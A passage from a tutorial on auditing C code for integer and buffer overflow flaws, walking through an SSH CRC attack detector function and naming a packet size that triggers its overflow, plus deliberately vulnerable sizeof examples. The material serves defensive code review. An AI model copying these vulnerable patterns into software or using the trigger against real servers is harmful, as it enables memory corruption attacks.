        len % SSH_BLOCKSIZE != 0) {
        fatal("detect_attack: bad length %d", len);
    }
for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
       ;
if (h == NULL) {
    debug("Installing crc compensation "
          "attack detector.");
    n = l;
    h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
} else {
    if (l > n) {
        n = l;
        h = (u_int16_t *)xrealloc(h, n * HASH_ENTRYSIZE);
    }
}
if (len <= HASH_MINBLOCKS) {
        for (c = buf; c < buf + len; c += SSH_BLOCKSIZE) {
            if (IV && (!CMP(c, IV))) {
                if ((check_crc(c, buf, len, IV)))
                    return (DEATTACK_DETECTED);
                else
                    break;
            }
            for (d = buf; d < c; d += SSH_BLOCKSIZE) {
                if (!CMP(c, d)) {
                    if ((check_crc(c, buf, len, IV)))
                    return (DEATTACK_DETECTED);
                else
                    break;
               }
           }
       }
       return (DEATTACK_OK);
    }
memset(h, HASH_UNUSEDCHAR, n * HASH_ENTRYSIZE);

    if (IV)
        h[HASH(IV) & (n - 1)] = HASH_IV;

    for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {
        for (i = HASH(c) & (n - 1); h[i] != HASH_UNUSED;
             i = (i + 1) & (n - 1)) {
            if (h[i] == HASH_IV) {
                if (!CMP(c, IV)) {
                    if (check_crc(c, buf, len, IV))
                        return (DEATTACK_DETECTED);
                    else
                        break;
                 }
             } else if (!CMP(c, buf + h[i] * SSH_BLOCKSIZE)) {
                 if (check_crc(c, buf, len, IV))
                     return (DEATTACK_DETECTED);
                 else
                     break;
             }
          }
          h[i] = j;
       }
    return (DEATTACK_OK);
}

 

 This is fairly a complex code and finding the vulnerability in the first glance is hard but you should concentrate on your goal. For example from the memset (line 66) we suspect a buffer overflow vulnerability and our goal is to check the code for any buffer overflow vulnerabilities. In one of the iterations we check the code for type conversion issues and for that we check variable definition and following assignments. After looking at the lines 6 to 12 we should focus on finding any assignments between u_int16_t variables (n and h) and u_int32_t variable (l). We quickly find a conversion in line 26 and further analysis shows that by sending a packet of size 262,144 we can cause a buffer overflow. Because the n variable is used for buffer allocation and the buffer will be used for saving network data in line 71.

While auditing always check operations that involve size_t (or unsigned int32) type which is the result type of most libc functions.  Any operations involving this variable leads to an unsigned integer type and so any implication to consider the result of operations as signed integer is incorrect. A probable mistake is using a size_t type in subtraction and then comparing the result with a negative value! Comparisons that are supposed to protect an allocation or an indexing are also candidate statements to look for vulnerabilities.  So always check these kinds of comparisons and have mind that unsigned values cannot be negative!

C vulnerable functions

As a rule of thumb you always should examine the possibility of passing negative numbers for read(), recvfrom(), memcpy(), memset(), bcopy(), snprintf(), strncat(), strncpy(), and malloc() methods. You should have seen subtle vulnerabilities in this article and by now you should be convinced that at certain situations these functions cannot be safe at all. The real problem is the calculation of the buffer these functions use and you should closely check them.

Also pay careful attention to the usage of sizeof() operator. Remember that the result of sizeof is unsigned int and operations including such result do not produce negative values. sizeof() operator should be closely examined in buffer allocation functions. One of the sizeof issues is its usage on a buffer pointer value, expecting it to return the size of buffer; the result of sizeof on a pointer type is the size of variable. For example result of sizeof on c (a char pointer) is 4! Another mistake is usage of sizeof to guard an allocation. For example:

int buf[1024];

int *b=buf;

 

while (havedata() && b < buf + sizeof(buf))

{

    *b++=parseint(getdata());

}

 

Here buf + sizeof(buf) does not guard the loop from buffer overflow because the loop executes 4092 times not 1024! This is because ++ on pointer advances the pointer to the next element not next byte.

Page 1 of 2
Advanced Programming Concepts
News Letter

Subscribe our Email News Letter to get Instant Update at anytime